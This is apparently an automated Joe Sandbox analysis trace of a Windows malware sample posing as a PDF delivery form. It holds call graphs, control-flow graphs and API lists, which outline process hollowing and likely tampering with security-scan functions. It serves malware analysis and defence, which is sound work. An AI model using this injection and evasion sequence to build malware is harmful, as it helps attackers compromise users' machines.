25451->25455 25452->25443 25454->25451 25456 2cd17e4 Sleep 25454->25456 25455->25450 25459 2cd1820 Sleep 25455->25459 25456->25440 25458 2cd15cc VirtualAlloc 25457->25458 25461 2cd19a4 25457->25461 25458->25461 25459->25451 25461->25416 25462->25416 25464 2cd1b6c 25463->25464 25465 2cd1aa1 25463->25465 25466 2cd16e8 25464->25466 25467 2cd1aa7 25464->25467 25465->25467 25468 2cd1b13 Sleep 25465->25468 25470 2cd1c66 25466->25470 25472 2cd1644 2 API calls 25466->25472 25469 2cd1ab0 25467->25469 25473 2cd1b4b Sleep 25467->25473 25477 2cd1b81 25467->25477 25468->25467 25471 2cd1b2d Sleep 25468->25471 25469->25429 25470->25429 25471->25465 25474 2cd16f5 VirtualFree 25472->25474 25475 2cd1b61 Sleep 25473->25475 25473->25477 25476 2cd170d 25474->25476 25475->25467 25476->25429 25478 2cd1ba4 25477->25478 25479 2cd1c00 VirtualFree 25477->25479 25478->25429 25479->25429 25481 2cd1681 25480->25481 25482 2cd164d 25480->25482 25481->25448 25482->25481 25483 2cd164f Sleep 25482->25483 25484 2cd1664 25483->25484 25484->25481 25485 2cd1668 Sleep 25484->25485 25485->25482 25490 2cd1560 25486->25490 25488 2cd15d4 VirtualAlloc 25489 2cd15eb 25488->25489 25489->25462 25491 2cd1500 25490->25491 25491->25488 25492 2cfc2fc 25502 2cd6518 25492->25502 25496 2cfc32a 25507 2cfbb50 timeSetEvent 25496->25507 25498 2cfc334 25499 2cfc342 GetMessageA 25498->25499 25500 2cfc336 TranslateMessage DispatchMessageA 25499->25500 25501 2cfc352 25499->25501 25500->25499 25503 2cd6523 25502->25503 25508 2cd4168 25503->25508 25506 2cd427c SysAllocStringLen SysFreeString SysReAllocStringLen 25506->25496 25507->25498 25509 2cd41ae 25508->25509 25510 2cd4227 25509->25510 25513 2cd43b8 25509->25513 25522 2cd4100 25510->25522 25514 2cd43e9 25513->25514 25518 2cd43fa 25513->25518 25527 2cd432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25514->25527 25516 2cd43f3 25516->25518 25517 2cd443f FreeLibrary 25517->25518 25518->25517 25519 2cd4463 25518->25519 25520 2cd446c 25519->25520 25521 2cd4472 ExitProcess 25519->25521 25520->25521 25523 2cd4143 25522->25523 25524 2cd4110 25522->25524 25523->25506 25524->25523 25525 2cd15cc VirtualAlloc 25524->25525 25528 2cd5814 25524->25528 25525->25524 25527->25516 25529 2cd5840 25528->25529 25530 2cd5824 GetModuleFileNameA 25528->25530 25529->25524 25532 2cd5a78 GetModuleFileNameA RegOpenKeyExA 25530->25532 25533 2cd5afb 25532->25533 25534 2cd5abb RegOpenKeyExA 25532->25534 25550 2cd58b4 12 API calls 25533->25550 25534->25533 25535 2cd5ad9 RegOpenKeyExA 25534->25535 25535->25533 25537 2cd5b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25535->25537 25539 2cd5c9e 25537->25539 25540 2cd5bbb 25537->25540 25538 2cd5b20 RegQueryValueExA 25541 2cd5b40 RegQueryValueExA 25538->25541 25542 2cd5b5e RegCloseKey 25538->25542 25539->25529 25540->25539 25544 2cd5bcb lstrlenA 25540->25544 25541->25542 25542->25529 25545 2cd5be3 25544->25545 25545->25539 25546 2cd5c08 lstrcpynA LoadLibraryExA 25545->25546 25547 2cd5c30 25545->25547 25546->25547 25547->25539 25548 2cd5c3a lstrcpynA LoadLibraryExA 25547->25548 25548->25539 25549 2cd5c6c lstrcpynA LoadLibraryExA 25548->25549 25549->25539 25550->25538 25551 2cd4e88 25552 2cd4e95 25551->25552 25555 2cd4e9c 25551->25555 25560 2cd4bdc SysAllocStringLen 25552->25560 25557 2cd4bfc 25555->25557 25558 2cd4c08 25557->25558 25559 2cd4c02 SysFreeString 25557->25559 25559->25558 25560->25555 25561 2cf67c4 26378 2cd480c 25561->26378 26379 2cd481d 26378->26379 26380 2cd485a 26379->26380 26381 2cd4843 26379->26381 26396 2cd4570 26380->26396 26387 2cd4b78 26381->26387 26384 2cd4850 26385 2cd488b 26384->26385 26401 2cd4500 26384->26401 26388 2cd4b85 26387->26388 26395 2cd4bb5 26387->26395 26390 2cd4bae 26388->26390 26392 2cd4b91 26388->26392 26393 2cd4570 11 API calls 26390->26393 26391 2cd4b9f 26391->26384 26407 2cd2c44 11 API calls 26392->26407 26393->26395 26408 2cd44ac 26395->26408 26397 2cd4598 26396->26397 26398 2cd4574 26396->26398 26397->26384 26421 2cd2c10 26398->26421 26400 2cd4581 26400->26384 26402 2cd4504 26401->26402 26405 2cd4514 26401->26405 26404 2cd4570 11 API calls 26402->26404 26402->26405 26403 2cd4542 26403->26385 26404->26405 26405->26403 26406 2cd2c2c 11 API calls 26405->26406 26406->26403 26407->26391 26409 2cd44cd 26408->26409 26410 2cd44b2 26408->26410 26409->26391 26410->26409 26412 2cd2c2c 26410->26412 26413 2cd2c3a 26412->26413 26414 2cd2c30 26412->26414 26413->26409 26414->26413 26415 2cd2d19 26414->26415 26419 2cd64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26414->26419 26420 2cd2ce8 7 API calls 26415->26420 26418 2cd2d3a 26418->26409 26419->26415 26420->26418 26422 2cd2c27 26421->26422 26424 2cd2c14 26421->26424 26422->26400 26423 2cd2c1e 26423->26400 26424->26423 26425 2cd2d19 26424->26425 26429 2cd64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26424->26429 26430 2cd2ce8 7 API calls 26425->26430 26428 2cd2d3a 26428->26400 26429->26425 26430->26428 26431 2cfbb44 26434 2ceec74 26431->26434 26435 2ceec7c 26434->26435 26435->26435 29423 2ce870c LoadLibraryW 26435->29423 26437 2ceec9e 29428 2cd2ee0 QueryPerformanceCounter 26437->29428 26439 2ceeca3 26440 2ceecad InetIsOffline 26439->26440 26441 2ceecc8 26440->26441 26442 2ceecb7 26440->26442 26444 2cd4500 11 API calls 26441->26444 26443 2cd4500 11 API calls 26442->26443 26445 2ceecc6 26443->26445 26444->26445 26446 2cd480c 11 API calls 26445->26446 26447 2ceecf5 26446->26447 26448 2ceecfd 26447->26448 29431 2cd4798 26448->29431 26450 2ceed20 26451 2ceed28 26450->26451 26452 2ceed32 26451->26452 29446 2ce8824 26452->29446 26455 2cd480c 11 API calls 26456 2ceed59 26455->26456 26457 2ceed61 26456->26457 26458 2cd4798 11 API calls 26457->26458 26459 2ceed84 26458->26459 26460 2ceed8c 26459->26460 26461 2ceed96 26460->26461 26462 2ce8824 20 API calls 26461->26462 26463 2ceed9f 26462->26463 26464 2cd480c 11 API calls 26463->26464 26465 2ceedbd 26464->26465 26466 2ceedc5 26465->26466 29459 2cd46a4 26466->29459 29461 2ce80c8 29423->29461 29425 2ce8745 29472 2ce7d00 29425->29472 29429 2cd2eed 29428->29429 29430 2cd2ef8 GetTickCount 29428->29430 29429->26439 29430->26439 29432 2cd47fd 29431->29432 29433 2cd479c 29431->29433 29434 2cd47a4 29433->29434 29435 2cd4500 29433->29435 29434->29432 29437 2cd47b3 29434->29437 29438 2cd4500 11 API calls 29434->29438 29439 2cd4570 11 API calls 29435->29439 29441 2cd4514 29435->29441 29436 2cd4542 29436->26450 29440 2cd4570 11 API calls 29437->29440 29438->29437 29439->29441 29443 2cd47cd 29440->29443 29441->29436 29442 2cd2c2c 11 API calls 29441->29442 29442->29436 29444 2cd4500 11 API calls 29443->29444 29445 2cd47f9 29444->29445 29445->26450 29447 2ce8838 29446->29447 29448 2ce8857 LoadLibraryA 29447->29448 29449 2ce8867 29448->29449 29450 2ce8020 17 API calls 29449->29450 29451 2ce886d 29450->29451 29452 2ce80c8 15 API calls 29451->29452 29453 2ce8886 29452->29453 29454 2ce7d00 18 API calls 29453->29454 29455 2ce88e5 FreeLibrary 29454->29455 29456 2ce88fd 29455->29456 29457 2cd44d0 11 API calls 29456->29457 29458 2ce890a 29457->29458 29458->26455 29460 2cd46aa 29459->29460 29462 2cd4500 11 API calls 29461->29462 29463 2ce80ed 29462->29463 29486 2ce7914 29463->29486 29466 2cd4798 11 API calls 29467 2ce8107 29466->29467 29468 2ce810f GetModuleHandleW GetProcAddress GetProcAddress 29467->29468 29469 2ce8142 29468->29469 29492 2cd44d0 29469->29492 29473 2cd4500 11 API calls 29472->29473 29474 2ce7d25 29473->29474 29475 2ce7914 12 API calls 29474->29475 29476 2ce7d32 29475->29476 29477 2cd4798 11 API calls 29476->29477 29478 2ce7d42 29477->29478 29497 2ce8020 29478->29497 29481 2ce80c8 15 API calls 29482 2ce7d5b NtWriteVirtualMemory 29481->29482 29483 2ce7d87 29482->29483 29484 2cd44d0 11 API calls 29483->29484 29485 2ce7d94 FreeLibrary 29484->29485 29485->26437 29487 2ce7925 29486->29487 29488 2cd4b78 11 API calls 29487->29488 29490 2ce7935 29488->29490 29489 2ce79a1 29489->29466 29490->29489 29496 2cdba44 CharNextA 29490->29496 29494 2cd44d6 29492->29494 29493 2cd44fc 29493->29425 29494->29493 29495 2cd2c2c 11 API calls 29494->29495 29495->29494 29496->29490 29498 2cd4500 11 API calls 29497->29498 29499 2ce8043 29498->29499 29500 2ce7914 12 API calls 29499->29500 29501 2ce8050 29500->29501 29502 2ce8058 GetModuleHandleA 29501->29502 29503 2ce80c8 15 API calls 29502->29503 29504 2ce8069 GetModuleHandleA 29503->29504 29505 2ce8087 29504->29505 29506 2cd44ac 11 API calls 29505->29506 29507 2ce7d55 29506->29507 29507->29481

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6797 2ce8bb0-2ce8bb3 6798 2ce8bb8-2ce8bbd 6797->6798 6798->6798 6799 2ce8bbf-2ce8ca6 call 2cd493c call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 6798->6799 6830 2ce8cac-2ce8d87 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 6799->6830 6831 2cea6f7-2cea761 call 2cd44d0 * 2 call 2cd4c0c call 2cd44d0 call 2cd44ac call 2cd44d0 * 2 6799->6831 6830->6831 6875 2ce8d8d-2ce90b5 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd30d4 * 2 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd4d8c call 2cd4d9c call 2ce85dc 6830->6875 6984 2ce9128-2ce9449 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd2ee0 call 2cd2f08 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 GetThreadContext 6875->6984 6985 2ce90b7-2ce9123 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 6875->6985 6984->6831 7093 2ce944f-2ce96b2 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce8254 6984->7093 6985->6984 7166 2ce99bf-2ce9a2a call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 7093->7166 7167 2ce96b8-2ce9821 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce84c4 7093->7167 7192 2ce9a30-2ce9bb0 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce79b4 7166->7192 7193 2ce9a2b call 2ce8824 7166->7193 7258 2ce984b-2ce98b6 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 7167->7258 7259 2ce9823-2ce9849 call 2ce79b4 7167->7259 7192->6831 7298 2ce9bb6-2ce9caf call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce8ac0 7192->7298 7193->7192 7266 2ce98bc-2ce99b3 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce79b4 7258->7266 7296 2ce98b7 call 2ce8824 7258->7296 7259->7266 7338 2ce99b8-2ce99bd 7266->7338 7296->7266 7349 2ce9d03-2cea45b call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce7d00 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce7d00 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 SetThreadContext NtResumeThread call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd2c2c call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce87a0 * 3 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 7298->7349 7350 2ce9cb1-2ce9cfe call 2ce89b8 call 2ce89ac 7298->7350 7338->7192 7575 2cea460-2cea6f2 call 2ce87a0 * 2 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 * 5 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2ce7ed4 call 2ce87a0 * 2 7349->7575 7350->7349 7575->6831
                                                                  APIs
                                                                    • Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
                                                                    • Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB
                                                                    • Part of subcall function 02CE85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CE8668
                                                                  • GetThreadContext.KERNEL32(00000864,02D31420,ScanString,02D313A4,02CEA77C,UacInitialize,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,UacInitialize,02D313A4), ref: 02CE9442
                                                                    • Part of subcall function 02CE8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE82C5
                                                                    • Part of subcall function 02CE84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CE8529
                                                                    • Part of subcall function 02CE79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27
                                                                    • Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74
                                                                  • SetThreadContext.KERNEL32(00000864,02D31420,ScanBuffer,02D313A4,02CEA77C,ScanString,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,00000874,00252FF8,02D314F8,00000004,02D314FC), ref: 02CEA157
                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000864,00000000,00000864,02D31420,ScanBuffer,02D313A4,02CEA77C,ScanString,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,00000874,00252FF8,02D314F8), ref: 02CEA164
                                                                    • Part of subcall function 02CE87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
                                                                    • Part of subcall function 02CE87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
                                                                    • Part of subcall function 02CE87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                  • API String ID: 1022112746-51457883
                                                                  • Opcode ID: 56badafe2a904b19fbef2b7f7cfa103169eddba6535aa1730e02b2893554d4af
                                                                  • Instruction ID: bfd46d06f1eb63b6db02e70e962cd4d84688b6ceea103092d750b7a24c8f7a83
                                                                  • Opcode Fuzzy Hash: 56badafe2a904b19fbef2b7f7cfa103169eddba6535aa1730e02b2893554d4af
                                                                  • Instruction Fuzzy Hash: 20E22A35A501189FDF25FBA4DD91ACE73BAEF88310F1141A1E24AAB214DB30EE46DF54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 7653 2ce8bae-2ce8bb3 7655 2ce8bb8-2ce8bbd 7653->7655 7655->7655 7656 2ce8bbf-2ce8ca6 call 2cd493c call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 7655->7656 7687 2ce8cac-2ce8d87 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 7656->7687 7688 2cea6f7-2cea761 call 2cd44d0 * 2 call 2cd4c0c call 2cd44d0 call 2cd44ac call 2cd44d0 * 2 7656->7688 7687->7688 7732 2ce8d8d-2ce90b5 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd30d4 * 2 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd4d8c call 2cd4d9c call 2ce85dc 7687->7732 7841 2ce9128-2ce9449 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd46a4 * 2 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd2ee0 call 2cd2f08 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 GetThreadContext 7732->7841 7842 2ce90b7-2ce9123 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 7732->7842 7841->7688 7950 2ce944f-2ce96b2 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce8254 7841->7950 7842->7841 8023 2ce99bf-2ce9a2a call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 7950->8023 8024 2ce96b8-2ce9821 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce84c4 7950->8024 8049 2ce9a30-2ce9bb0 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce79b4 8023->8049 8050 2ce9a2b call 2ce8824 8023->8050 8115 2ce984b-2ce98b6 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 8024->8115 8116 2ce9823-2ce9849 call 2ce79b4 8024->8116 8049->7688 8155 2ce9bb6-2ce9caf call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce8ac0 8049->8155 8050->8049 8123 2ce98bc-2ce99bd call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce79b4 8115->8123 8153 2ce98b7 call 2ce8824 8115->8153 8116->8123 8123->8049 8153->8123 8206 2ce9d03-2cea6f2 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce7d00 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce7d00 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 SetThreadContext NtResumeThread call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2cd2c2c call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce87a0 * 3 call 2cd480c call 2cd494c call 2cd46a4 call 2cd4798 call 2cd494c call 2cd46a4 call 2ce8824 call 2ce87a0 * 2 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 * 5 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2cd480c call 2cd494c call 2cd4798 call 2cd494c call 2ce87a0 call 2ce7ed4 call 2ce87a0 * 2 8155->8206 8207 2ce9cb1-2ce9cfe call 2ce89b8 call 2ce89ac 8155->8207 8206->7688 8207->8206
                                                                  APIs
                                                                    • Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
